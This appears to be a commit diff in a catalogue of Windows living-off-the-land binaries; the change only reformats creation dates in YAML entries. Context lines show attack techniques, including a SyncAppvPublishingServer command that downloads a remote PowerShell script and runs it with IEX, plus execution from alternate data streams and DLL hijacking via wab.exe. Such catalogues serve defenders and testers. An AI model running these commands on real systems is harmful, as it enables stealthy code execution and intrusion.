- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Description: Example command on how inject Powershell code into the process Description: Example command on how inject Powershell code into the process

View File

@ -2,7 +2,7 @@
Name: Ttdinject.exe Name: Ttdinject.exe
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: 'Maxime Nadeau' Author: 'Maxime Nadeau'
Created: '2020-05-12' Created: 2020-05-12
Commands: Commands:
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.

View File

@ -2,7 +2,7 @@
Name: Tttracer.exe Name: Tttracer.exe
Description: Used by Windows 1809 and newer to Debug Time Travel Description: Used by Windows 1809 and newer to Debug Time Travel
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2019-11-5' Created: 2019-11-05
Commands: Commands:
- Command: tttracer.exe C:\windows\system32\calc.exe - Command: tttracer.exe C:\windows\system32\calc.exe
Description: Execute calc using tttracer.exe. Requires administrator privileges Description: Execute calc using tttracer.exe. Requires administrator privileges

View File

@ -2,7 +2,7 @@
Name: vbc.exe Name: vbc.exe
Description: Binary file used for compile vbs code Description: Binary file used for compile vbs code
Author: Lior Adar Author: Lior Adar
Created: 27/02/2020 Created: 2020-02-27
Commands: Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe Description: Binary file used by .NET to compile vb code to .exe

View File

@ -2,7 +2,7 @@
Name: Verclsid.exe Name: Verclsid.exe
Description: Description:
Author: '@bohops' Author: '@bohops'
Created: '2018-12-04' Created: 2018-12-04
Commands: Commands:
- Command: verclsid.exe /S /C {CLSID} - Command: verclsid.exe /S /C {CLSID}
Description: Used to verify a COM object before it is instantiated by Windows Explorer Description: Used to verify a COM object before it is instantiated by Windows Explorer

View File

@ -2,7 +2,7 @@
Name: Wab.exe Name: Wab.exe
Description: Windows address book manager Description: Windows address book manager
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: wab.exe - Command: wab.exe
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice

View File

@ -2,7 +2,7 @@
Name: Wmic.exe Name: Wmic.exe
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe" - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)

View File

@ -2,7 +2,7 @@
Name: Wscript.exe Name: Wscript.exe
Description: Used by Windows to execute scripts Description: Used by Windows to execute scripts
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: 2018-05-25
Commands: Commands:
- Command: wscript c:\ads\file.txt:script.vbs - Command: wscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream Description: Execute script stored in an alternate data stream

Some files were not shown because too many files have changed in this diff Show More